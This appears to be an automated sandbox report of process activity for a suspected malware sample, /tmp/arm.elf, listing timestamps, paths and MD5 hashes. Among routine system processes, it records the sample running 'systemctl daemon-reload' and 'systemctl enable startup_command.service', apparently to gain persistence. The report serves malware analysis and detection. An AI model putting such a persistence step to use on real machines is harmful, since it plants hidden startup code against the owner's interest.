                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:26
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:31
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:34
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:36
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:36
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:41
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:41
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:49
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:49
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:49
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:56
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:50:56
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:51:01
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:51:01
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:51:04
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:51:06
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:51:06
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:51:16
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:51:19
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:17
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:17
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:17
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:17
                                              Start date (UTC):06/01/2025
                                              Path:/bin/sh
                                              Arguments:sh -c "systemctl daemon-reload"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:17
                                              Start date (UTC):06/01/2025
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:17
                                              Start date (UTC):06/01/2025
                                              Path:/usr/bin/systemctl
                                              Arguments:systemctl daemon-reload
                                              File size:996584 bytes
                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:18
                                              Start date (UTC):06/01/2025
                                              Path:/tmp/arm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:18
                                              Start date (UTC):06/01/2025
                                              Path:/bin/sh
                                              Arguments:sh -c "systemctl enable startup_command.service"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:18
                                              Start date (UTC):06/01/2025
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:18
                                              Start date (UTC):06/01/2025
                                              Path:/usr/bin/systemctl
                                              Arguments:systemctl enable startup_command.service
                                              File size:996584 bytes
                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:17
                                              Start date (UTC):06/01/2025
                                              Path:/usr/lib/systemd/systemd
                                              Arguments:-
                                              File size:1620224 bytes
                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:17
                                              Start date (UTC):06/01/2025
                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              File size:22760 bytes
                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:19
                                              Start date (UTC):06/01/2025
                                              Path:/usr/lib/systemd/systemd
                                              Arguments:-
                                              File size:1620224 bytes
                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:19
                                              Start date (UTC):06/01/2025
                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              File size:22760 bytes
                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:19
                                              Start date (UTC):06/01/2025
                                              Path:/usr/libexec/gnome-session-binary
                                              Arguments:-
                                              File size:334664 bytes
                                              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:19
                                              Start date (UTC):06/01/2025
                                              Path:/bin/sh
                                              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:19
                                              Start date (UTC):06/01/2025
                                              Path:/usr/libexec/gsd-rfkill
                                              Arguments:/usr/libexec/gsd-rfkill
                                              File size:51808 bytes
                                              MD5 hash:88a16a3c0aba1759358c06215ecfb5cc

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:21
                                              Start date (UTC):06/01/2025
                                              Path:/usr/lib/systemd/systemd
                                              Arguments:-
                                              File size:1620224 bytes
                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:21
                                              Start date (UTC):06/01/2025
                                              Path:/lib/systemd/systemd-hostnamed
                                              Arguments:/lib/systemd/systemd-hostnamed
                                              File size:35040 bytes
                                              MD5 hash:2cc8a5576629a2d5bd98e49a4b8bef65

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:21
                                              Start date (UTC):06/01/2025
                                              Path:/usr/sbin/gdm3
                                              Arguments:-
                                              File size:453296 bytes
                                              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:21
                                              Start date (UTC):06/01/2025
                                              Path:/etc/gdm3/PrimeOff/Default
                                              Arguments:/etc/gdm3/PrimeOff/Default
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:21
                                              Start date (UTC):06/01/2025
                                              Path:/usr/sbin/gdm3
                                              Arguments:-
                                              File size:453296 bytes
                                              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:21
                                              Start date (UTC):06/01/2025
                                              Path:/etc/gdm3/PrimeOff/Default
                                              Arguments:/etc/gdm3/PrimeOff/Default
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:31
                                              Start date (UTC):06/01/2025
                                              Path:/usr/lib/systemd/systemd
                                              Arguments:-
                                              File size:1620224 bytes
                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                              Chronological Activities


                                              General

                                              Start time (UTC):23:49:31
                                              Start date (UTC):06/01/2025
                                              Path:/lib/systemd/systemd-user-runtime-dir
                                              Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
                                              File size:22672 bytes
                                              MD5 hash:d55f4b0847f88131dbcfb07435178e54

                                              Chronological Activities